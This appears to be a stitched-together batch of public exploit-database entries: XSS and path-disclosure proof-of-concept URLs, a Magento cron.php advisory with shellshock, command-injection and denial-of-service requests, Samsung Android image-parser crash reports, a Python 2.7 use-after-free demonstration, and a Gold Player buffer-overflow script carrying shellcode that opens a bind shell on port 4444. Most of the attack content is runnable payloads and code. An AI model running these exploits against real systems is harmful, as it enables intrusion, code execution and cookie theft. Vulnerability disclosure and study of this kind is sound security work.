onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked></td><td><label
for='box115' class='bold'>Wed February 06th</label> <label for='box115' class='bold'>(test)</label></td><td><label
for='box115' class='text'><script>alert(document.cookie)</script> </label></td></tr>
<snip>
source: https://www.securityfocus.com/bid/61152/info
Corda Highwire is prone to a path disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
http://www.example.com/highwire.ashx?url=../../
# Exploit Title: eBay Magento CE <= 1.9.2.1 Unrestricted Cron Script (Potential Code Execution / DoS)
# Date: 06.11.2015
# Exploit Author: Dawid Golunski
# Vendor Homepage: http://magento.com
# Version: eBay Magento CE <= 1.9.2.1 / Magento EE <=1.14.2.1
# Tested on: Linux
# Magento reference ID: APPSEC-1045
=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium
- eBay Magento ref.: APPSEC-1037
=============================================
I. VULNERABILITY
-------------------------
eBay Magento CE <= 1.9.2.1 Unrestricted Cron Script (Potential Code Execution / DoS)
eBay Magento EE <= 1.14.2.1
II. BACKGROUND
-------------------------
- eBay Magento eCommerce
http://magento.com/
"More than 240,000 merchants worldwide put their trust in our eCommerce
software. Magento's eCommerce platform gives you the tools you need to attract
more prospects, sell more products, and make more money. It's what we do.
We're owned by eBay, so you know we're eCommerce experts"
III. INTRODUCTION
-------------------------
The default installation of eBay Magento eCommerce software ships with a
cron.php script that manages scheduled tasks. The script is not protected by
default and can be accessed publicly.
The publicly exposed cron script poses several potential risks, such as
exploitation of the well-known shellshock vulnerability on unpatched systems,
leading to code execution.
The same script has another potential command execution vector that stems from
improper sanitisation of data passed to a shell_exec() call.
Apart from the code execution vectors, the script could potentially be used for
a DoS attack, since it lacks a locking mechanism that would prevent it from
spawning multiple instances of its helper shell scripts.
IV. DESCRIPTION
-------------------------
A) Shellshock vector
Magento cron.php script includes a command execution function that looks as
follows:
-----[ magento/cron.php ]-----
...
try {
    if (stripos(PHP_OS, 'win') === false) {
        $options = getopt('m::');
        if (isset($options['m'])) {
            if ($options['m'] == 'always') {
                $cronMode = 'always';
            } elseif ($options['m'] == 'default') {
                $cronMode = 'default';
            } else {
                Mage::throwException('Unrecognized cron mode was defined');
            }
        } else if (!$isShellDisabled) {
            $fileName = basename(__FILE__);
            $baseDir = dirname(__FILE__);
            shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &");
            shell_exec("/bin/sh $baseDir/cron.sh $fileName -malways 1 > /dev/null 2>&1 &");
            exit;
        }
...
------------------------------
As can be seen, the script calls shell_exec(), which runs the command through
/bin/sh; on many systems (RHEL/CentOS, for example) /bin/sh is a symlink to
/bin/bash.
Although the shellshock vulnerability should be patched by now, there have been
reports of Linux distributions that patched the issue insufficiently and
remained vulnerable.
Magento's cron.php could be used to exploit the shellshock vulnerability on
unpatched systems which host Magento in CGI mode (which can easily be enabled
via the .htaccess file shipped with Magento).
B) Command injection
The script does not sanitise the data coming from the $baseDir variable.
Input passed to shell execution functions should always be escaped with the
escapeshellcmd() / escapeshellarg() PHP functions.
Although not exploitable on its own, the lack of escaping could allow system
commands to be injected on Magento hosting platforms that offer a feature to
create backups of directories under a user-specified name within the document
root.
If the hosting control panel allows the names of such backups to be chosen
freely, a user could inject malicious data into the directory name, which would
result in command injection when cron.php is run from the backup directory.
The command executes as soon as shell_exec() receives the malicious data
carried in the $baseDir variable.
C) Denial of Service
As the script lacks both access control and a locking mechanism, it is possible
to request cron.php remotely multiple times in order to make it spawn
multiple instances of the cron.sh script.
Since a single execution of the script results in two spawned cron.sh
processes, plus a separate CGI process (if the site runs as CGI), an attacker
could overload the Magento site with multiple requests and create a Denial of
Service condition through process exhaustion.
V. PROOF OF CONCEPT
-------------------------
A) Shellshock vector exploit
Sending the following request to a CGI-enabled Magento site:
GET /magento/cron.php HTTP/1.1
Host: victim_magento_site
User-Agent: () { :; } ; /bin/touch /tmp/magento_cron_hack
will result in a command execution on shellshock affected systems.
The result of the above would be:
victim$ ls -l /tmp/magento_cron_hack
-rw-rw-rw- 1 www-data www-data 0 Jul 26 09:08 /tmp/magento_cron_hack
B) Command injection
Due to the lack of sanitisation, if a malicious Magento user had access
to a backup facility, he could potentially create a backup of the magento
directory with a command within the name, e.g.:
$(id)
The user could then request the cron.php script via the following request:
GET /magento/$(id)/cron.php HTTP/1.1
Host: victim_magento_site
Because of the shell_exec() function in the quoted sourcecode of cron.php:
---
$baseDir = dirname(__FILE__);
shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &");
---
it would cause the cron.php script to run the following command:
/bin/sh /var/www/magento/$(id)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 &
The command would run id program as soon as bash command expansion syntax of
$() got evaluated.
An attacker could also run more complex commands, by hex encoding disallowed
characters within directory names (such as '/' directory separator).
For example, he could run the command:
touch /tmp/magento_exec
by encoding it as follows:
echo 'touch /tmp/magento_exec' | hexdump -v -e '"\\\\\\""x" 1/1 "%02x" ""' ${1}
\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63
He could then execute it via a GET request of:
GET /magento/$(`echo%20-e%20\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63`)/exec.php HTTP/1.1
which would execute:
/bin/sh /var/www/magento/exec_poc/$(`echo -e \\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63`)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 &
resulting in creating the PoC file:
victim$ ls -l /tmp/magento_exec
-rw-r--r-- 1 www-data www-data 0 Jul 26 11:20 /tmp/magento_exec
C) Denial of Service
By sending multiple requests to cron.php, for example using apache benchmark
tool:
attacker$ ab -n 500 -c 30 http://victim_magento_site/magento/cron.php
an attacker could exploit the lack of locking to spawn numerous processes,
potentially leading to resource exhaustion and a DoS condition.
The above command would result in creating multiple instances of the
cron.php/cron.sh scripts on the target host:
...
www-data 5529 0.2 1.3 287756 6872 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -mdefault
www-data 5531 0.2 1.1 288000 5848 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -mdefault
www-data 5533 0.2 1.2 288000 6432 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5535 0.3 1.2 288000 6484 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5537 0.3 1.5 288768 7740 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5539 0.3 1.3 287524 6956 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5541 0.3 1.4 288768 7168 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5543 0.3 1.4 288288 7188 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5546 0.3 1.4 288512 7188 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5885 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5886 0.0 0.0 17880 456 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5887 0.0 0.0 17880 456 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5888 0.0 0.0 17880 440 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5889 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5890 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5891 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5899 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5900 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5901 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5904 0.0 0.0 17880 500 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5907 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5909 0.0 0.0 17880 500 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5910 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5912 0.0 0.0 17880 464 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5913 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
...
VI. BUSINESS IMPACT
-------------------------
The issue has been rated as medium. Depending on the Magento hosting features
and the applied patches, code execution could be possible, which would increase
the risk.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of eBay Magento CE (1.9.2.1) was confirmed to contain
the vulnerable cron.php script.
The Magento EE versions also contain this problem according to the vendor's
advisory.
VIII. SOLUTION
-------------------------
eBay Magento assigned this issue the ID of APPSEC-1037 and supplied a patch
for it within the SUPEE-6788 patch bundle available on the official website.
The patch adds sanitisation functions around the shell_exec() code; however,
the cron script remains publicly accessible.
It is recommended to protect the cron script by other means.
For example, the script could require a key supplied with the GET request
before proceeding with execution, a mechanism commonly used by other major
open source solutions.
The easiest approach would be restricting access to the script to only
certain IPs or localhost within the web server configuration.
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/Magento-Unrestricted-Cron-Script-Vulnerability.txt
Official eBay Magento website:
http://magento.com/
Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML
Functionality Using Multibyte Payloads' (APPSEC-1037) is available at:
https://magento.com/security/patches/supee-6788
X. CREDITS
-------------------------
The vulnerabilities have been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
Nov 6th, 2015: Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
Source: https://code.google.com/p/google-security-research/issues/detail?id=497
Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.
I/DEBUG ( 2961): pid: 12383, tid: 12549, name: thread-pool-1 >>> com.sec.android.gallery3d <<<
I/DEBUG ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000
I/DEBUG ( 2961): x0 0000000089e8117c x1 00000000000000ff x2 00000000177fe13c x3 0000000089e8117c
I/DEBUG ( 2961): x4 0000000000000004 x5 0000007f65f42300 x6 0000000000000002 x7 ffffffffffffffff
I/DEBUG ( 2961): x8 0000000089e83ff0 x9 0000007f65f020b0 x10 000000000000003c x11 000000000000003b
I/DEBUG ( 2961): x12 0000007f65f02080 x13 00000000ffffffff x14 0000007f65f02080 x15 00000000000061e0
I/DEBUG ( 2961): x16 0000007f6baccc10 x17 0000007f958f8d80 x18 0000007f9596da40 x19 0000007f65f0e180
I/DEBUG ( 2961): x20 0000007f65f54020 x21 00000000002f0020 x22 0000000000000020 x23 0000000005e00400
I/DEBUG ( 2961): x24 0000000000000004 x25 0000007f65f42300 x26 0000000000000020 x27 0000007f65f52080
I/DEBUG ( 2961): x28 00000000000001da x29 0000000013071460 x30 0000007f6ba7e40c
I/DEBUG ( 2961): sp 0000007f66796130 pc 0000007f958f8e28 pstate 0000000020000000
I/DEBUG ( 2961):
I/DEBUG ( 2961): backtrace:
I/InjectionManager(12532): Inside getClassLibPath caller
I/DEBUG ( 2961): #00 pc 0000000000019e28 /system/lib64/libc.so (memset+168)
I/DEBUG ( 2961): #01 pc 0000000000030408 /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
I/DEBUG ( 2961): #02 pc 0000000000033440 /system/lib64/libSecMMCodec.so (DecodeFile+120)
I/DEBUG ( 2961): #03 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG ( 2961): #04 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
To reproduce, download the file and open it in Gallery.
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38613.zip
source: https://www.securityfocus.com/bid/60853/info
Nameko is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Nameko 0.10.146 and prior are vulnerable.
http://www.example.com/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66
source: https://www.securityfocus.com/bid/60859/info
Atomy Maxsite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Atomy Maxsite versions 1.50 through 2.5 are vulnerable.
http://www.example.com/[path]/index.php?name=research&file=add&op=research_add
source: https://www.securityfocus.com/bid/60860/info
The Xorbin Analog Flash Clock plugin is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Xorbin Analog Flash Clock 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/xorbin-analog-flash-clock/media/xorAnalogClock.swf#?urlWindow=_self&widgetUrl=javascript:alert(1);
#!/usr/bin/python
# EXPLOIT TITLE: GOLD PLAYER Local Exploit
# AUTHOR: Vivek Mahajan - C3p70r
# Credits: Gabor Seljan
# Date of Testing: 30 October 2015
# Download Link : http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html
# Tested On : Windows 8.1 Pro and Windows 7 Ultimate
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called buffer.txt
# Step 3: Open the file buffer.txt and copy the contents.
# Step 4: Open the Gold Player application -> file -> open flash url and paste the contents
# Step 5: Click on Open
# That should open a bind tcp port at 4444
# Step 6: Connect with netcat at port 4444
buffer = "A"*280
buffer += "\x83\x34\x04\x10"
buffer += "\x90"*100
buffer += ("\xba\x01\x75\x34\x3a\xdb\xd4\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x53\x31\x57\x12\x03\x57\x12\x83\xc6\x71\xd6\xcf\x34\x91\x94"
"\x30\xc4\x62\xf9\xb9\x21\x53\x39\xdd\x22\xc4\x89\x95\x66\xe9"
"\x62\xfb\x92\x7a\x06\xd4\x95\xcb\xad\x02\x98\xcc\x9e\x77\xbb"
"\x4e\xdd\xab\x1b\x6e\x2e\xbe\x5a\xb7\x53\x33\x0e\x60\x1f\xe6"
"\xbe\x05\x55\x3b\x35\x55\x7b\x3b\xaa\x2e\x7a\x6a\x7d\x24\x25"
"\xac\x7c\xe9\x5d\xe5\x66\xee\x58\xbf\x1d\xc4\x17\x3e\xf7\x14"
"\xd7\xed\x36\x99\x2a\xef\x7f\x1e\xd5\x9a\x89\x5c\x68\x9d\x4e"
"\x1e\xb6\x28\x54\xb8\x3d\x8a\xb0\x38\x91\x4d\x33\x36\x5e\x19"
"\x1b\x5b\x61\xce\x10\x67\xea\xf1\xf6\xe1\xa8\xd5\xd2\xaa\x6b"
"\x77\x43\x17\xdd\x88\x93\xf8\x82\x2c\xd8\x15\xd6\x5c\x83\x71"
"\x1b\x6d\x3b\x82\x33\xe6\x48\xb0\x9c\x5c\xc6\xf8\x55\x7b\x11"
"\xfe\x4f\x3b\x8d\x01\x70\x3c\x84\xc5\x24\x6c\xbe\xec\x44\xe7"
"\x3e\x10\x91\x92\x36\xb7\x4a\x81\xbb\x07\x3b\x05\x13\xe0\x51"
"\x8a\x4c\x10\x5a\x40\xe5\xb9\xa7\x6b\x18\x66\x21\x8d\x70\x86"
"\x67\x05\xec\x64\x5c\x9e\x8b\x97\xb6\xb6\x3b\xdf\xd0\x01\x44"
"\xe0\xf6\x25\xd2\x6b\x15\xf2\xc3\x6b\x30\x52\x94\xfc\xce\x33"
"\xd7\x9d\xcf\x19\x8f\x3e\x5d\xc6\x4f\x48\x7e\x51\x18\x1d\xb0"
"\xa8\xcc\xb3\xeb\x02\xf2\x49\x6d\x6c\xb6\x95\x4e\x73\x37\x5b"
"\xea\x57\x27\xa5\xf3\xd3\x13\x79\xa2\x8d\xcd\x3f\x1c\x7c\xa7"
"\xe9\xf3\xd6\x2f\x6f\x38\xe9\x29\x70\x15\x9f\xd5\xc1\xc0\xe6"
"\xea\xee\x84\xee\x93\x12\x35\x10\x4e\x97\x45\x5b\xd2\xbe\xcd"
"\x02\x87\x82\x93\xb4\x72\xc0\xad\x36\x76\xb9\x49\x26\xf3\xbc"
"\x16\xe0\xe8\xcc\x07\x85\x0e\x62\x27\x8c")
buffer += ".swf"
file = open('buffer.txt', 'w')
file.write(buffer)
file.close()
# Follow on Twitter @vik_create
Source: https://code.google.com/p/google-security-research/issues/detail?id=499
The attached files cause memory corruption when they are scanned by the face recognition library in android.media.process.
From faces-art.bmp
F/libc (11305): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 11555 (Thread-1136)
I/DEBUG ( 2955): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 2955): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG ( 2955): Revision: '10'
I/DEBUG ( 2955): ABI: 'arm64'
I/DEBUG ( 2955): pid: 11305, tid: 11555, name: Thread-1136 >>> android.process.media <<<
I/DEBUG ( 2955): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
I/DEBUG ( 2955): x0 0000007f94ca2100 x1 0000007f94c63480 x2 0000007f94c0e200 x3 0000000000000000
I/DEBUG ( 2955): x4 0000000000000000 x5 0000000000000040 x6 000000000000003f x7 0000000000000000
I/DEBUG ( 2955): x8 0000007f94c0e240 x9 0000000000000004 x10 000000000000003b x11 000000000000003a
I/DEBUG ( 2955): x12 0000007f94c02080 x13 00000000ffffffff x14 0000007f94c02080 x15 000000000151c5e8
I/DEBUG ( 2955): x16 0000007f885fe900 x17 0000007f9ee60d80 x18 0000007f9eed5a40 x19 0000007f94c1d100
I/DEBUG ( 2955): x20 0000000000000000 x21 0000007f94c65150 x22 0000007f949d0550 x23 0000007f94c1d110
I/DEBUG ( 2955): x24 0000000012d39070 x25 0000000000000066 x26 0000000012d23b80 x27 0000000000000066
I/DEBUG ( 2955): x28 0000000000000000 x29 0000007f949cfd70 x30 0000007f87acd200
I/DEBUG ( 2955): sp 0000007f949cfd70 pc 0000000000000000 pstate 0000000040000000
I/DEBUG ( 2955):
I/DEBUG ( 2955): backtrace:
I/DEBUG ( 2955): #00 pc 0000000000000000 <unknown>
I/DEBUG ( 2955): #01 pc 0000000000000001 <unknown>
I/DEBUG ( 2955): #02 pc 26221b0826221b08 <unknown>
To reproduce, download the attached file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38611.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=500
There is a crash when the Samsung Gallery application loads the attached GIF, colormap.gif.
D/skia (10905): GIF - Parse error
D/skia (10905): --- decoder->decode returned false
F/libc (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
I/DEBUG ( 2958): pid: 10905, tid: 11276, name: thread-pool-0 >>> com.sec.android.gallery3d <<<
I/DEBUG ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
I/DEBUG ( 2958): x0 0000000000000001 x1 0000000089f725ac x2 0000000000000000 x3 00000000fff9038c
I/DEBUG ( 2958): x4 0000007f9c300000 x5 000000000000001f x6 0000000000000001 x7 0000007f9c620048
I/DEBUG ( 2958): x8 0000000000000000 x9 0000000000000000 x10 0000000000000080 x11 0000000000003758
I/DEBUG ( 2958): x12 0000000000000020 x13 0000000000000020 x14 00000000000000a5 x15 000000000000001f
I/DEBUG ( 2958): x16 00000000ffffe4e3 x17 00000000000000a5 x18 0000007f9c300000 x19 0000007f9c61fc00
I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000000000003b x23 0000000000000001
I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080
I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64
I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000
I/DEBUG ( 2958):
I/DEBUG ( 2958): backtrace:
I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200)
I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340)
I/DEBUG ( 2958): #02 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
To reproduce, download the file and open it in Gallery.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38610.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=498
The attached jpg, upsample.jpg, can cause memory corruption when media scanning occurs.
F/libc ( 8600): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x206e6f69747562 in tid 8685 (HEAVY#0)
I/DEBUG ( 2956): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 2956): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG ( 2956): Revision: '10'
I/DEBUG ( 2956): ABI: 'arm64'
I/DEBUG ( 2956): pid: 8600, tid: 8685, name: HEAVY#0 >>> com.samsung.dcm:DCMService <<<
I/DEBUG ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
I/DEBUG ( 2956): x0 0000007f8cef2ab0 x1 0000000000000002 x2 0000007f8cef2ab0 x3 0000007f8ce5a390
I/DEBUG ( 2956): x4 0000007f8cef28d0 x5 3d206e6f69747562 x6 0000007f8cef29f0 x7 42e34ca342e32177
I/DEBUG ( 2956): x8 42e390a242e37199 x9 42dfe02f42debc0f x10 42e06c3442e03665 x11 42e0afd542e08c24
I/DEBUG ( 2956): x12 42e1070042e0e62d x13 42e1830842e146da x14 42e1f53342e1add4 x15 00000000000014a4
I/DEBUG ( 2956): x16 0000007f9f0d6ae0 x17 0000007fa3e7e880 x18 0000007f8ce75c60 x19 0000007f8cebe000
I/DEBUG ( 2956): x20 0000000000000001 x21 0000007f8cebe000 x22 0000000000000001 x23 0000000000000000
I/DEBUG ( 2956): x24 0000000000000000 x25 0000000000000000 x26 0000000010000000 x27 0000007f8c5ff050
I/DEBUG ( 2956): x28 0000007f8ce77800 x29 000000000000001c x30 0000007f9f09fff8
I/DEBUG ( 2956): sp 0000007f8d0fea20 pc 0000007f9f09e83c pstate 0000000080000000
I/DEBUG ( 2956):
I/DEBUG ( 2956): backtrace:
I/DEBUG ( 2956): #00 pc 000000000009b83c /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG ( 2956): #01 pc 000000000009cff4 /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)
I/DEBUG ( 2956): #02 pc 0000000000035700 /system/lib64/libQjpeg.so (WINKJ_ProgProcessData+236)
I/DEBUG ( 2956): #03 pc 0000000000041f08 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+688)
I/DEBUG ( 2956): #04 pc 00000000000428d4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG ( 2956): #05 pc 0000000000042a08 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG ( 2956): #06 pc 000000000004420c /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG ( 2956): #07 pc 00000000000a4234 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG ( 2956): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG ( 2956): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG ( 2956): #10 pc 00000000000018ec /system/framework/arm64/saiv.odex
To reproduce, download the image file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zip
Title: Python 2.7 array.fromstring Use After Free
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-array-fromstring-Use-After-Free
Url2: http://bugs.python.org/issue24613
Resolution: Fixed
The Python 2.7 array.fromstring() method suffers from a use after free caused by unsafe realloc use. The issue is triggered when an array is concatenated to itself via a fromstring() call:
static PyObject *
array_fromstring(arrayobject *self, PyObject *args)
{
    char *str;
    Py_ssize_t n;
    int itemsize = self->ob_descr->itemsize;
    if (!PyArg_ParseTuple(args, "s#:fromstring", &str, &n)) <<<< The str buffer is parsed from args. In cases where an array is passed to itself, self->ob_item == str.
        return NULL;
    if (n % itemsize != 0) {
        PyErr_SetString(PyExc_ValueError,
                        "string length not a multiple of item size");
        return NULL;
    }
    n = n / itemsize;
    if (n > 0) {
        char *item = self->ob_item; <<<< If str == self->ob_item, item == str.
        if ((n > PY_SSIZE_T_MAX - Py_SIZE(self)) ||
            ((Py_SIZE(self) + n) > PY_SSIZE_T_MAX / itemsize)) {
            return PyErr_NoMemory();
        }
        PyMem_RESIZE(item, char, (Py_SIZE(self) + n) * itemsize); <<<< A realloc call occurs here with item passed as the ptr argument. Because realloc sometimes calls free(), this means that item may be freed. If item was equal to str, str is now pointing to freed memory.
        if (item == NULL) {
            PyErr_NoMemory();
            return NULL;
        }
        self->ob_item = item;
        Py_SIZE(self) += n;
        self->allocated = Py_SIZE(self);
        memcpy(item + (Py_SIZE(self) - n) * itemsize,
               str, itemsize*n); <<<< If str is dangling at this point, a use after free occurs here.
    }
    Py_INCREF(Py_None);
    return Py_None;
}
In most cases when this occurs, the function behaves as expected; while the dangling str pointer is technically pointing to deallocated memory, given the timing it is highly likely the memory contains the expected data. However, occasionally, an errant allocation will occur between the realloc and memcpy, leading to unexpected contents in the str buffer.
In applications that expose otherwise innocuous indirect object control of arrays as attack surface, it may be possible for an attacker to trigger the corruption of arrays. This could potentially be exploited to exfiltrate data or achieve privilege escalation, depending on subsequent operations performed using corrupted arrays.
A proof-of-concept follows:
import array
import sys
import random

testNumber = 0

def dump(value):
    global testNumber
    i = 0
    for x in value:
        y = ord(x)
        if (y != 0x41):
            end = ''.join(value[i:]).index('A' * 0x10)
            sys.stdout.write("%08x a[%08x]: " % (testNumber, i))
            for z in value[i:i+end]: sys.stdout.write(hex(ord(z))[2:])
            sys.stdout.write('\r\n')
            break
        i += 1

def copyArray():
    global testNumber
    while True:
        a=array.array("c",'A'*random.randint(0x0, 0x10000))
        a.fromstring(a)
        dump(a)
        testNumber += 1

print "Starting..."
copyArray()
The script repeatedly creates randomly sized arrays filled with 0x41, then calls fromstring() and checks the array for corruption. If any is found, the relevant bytes are written to the console as hex. The output should look something like this:
Starting...
00000007 a[00000cdc]: c8684d0b0f54c0
0000001d a[0000f84d]: b03f4f0b8be620
00000027 a[0000119f]: 50724d0b0f54c0
0000004c a[00000e53]: b86b4d0b0f54c0
0000005a a[000001e1]: d8ab4609040620
00000090 a[0000015b]: 9040620104e5f0
0000014d a[000002d6]: 10ec620d8ab460
00000153 a[000000f7]: 9040620104e5f0
0000023c a[00000186]: 50d34c0f8b65a0
00000279 a[000001c3]: d8ab4609040620
000002ee a[00000133]: 9040620104e5f0
000002ff a[00000154]: 9040620104e5f0
0000030f a[00000278]: 10ec620d8ab460
00000368 a[00000181]: 50d34c0f8b65a0
000003b2 a[0000005a]: d0de5f0d05e5f0
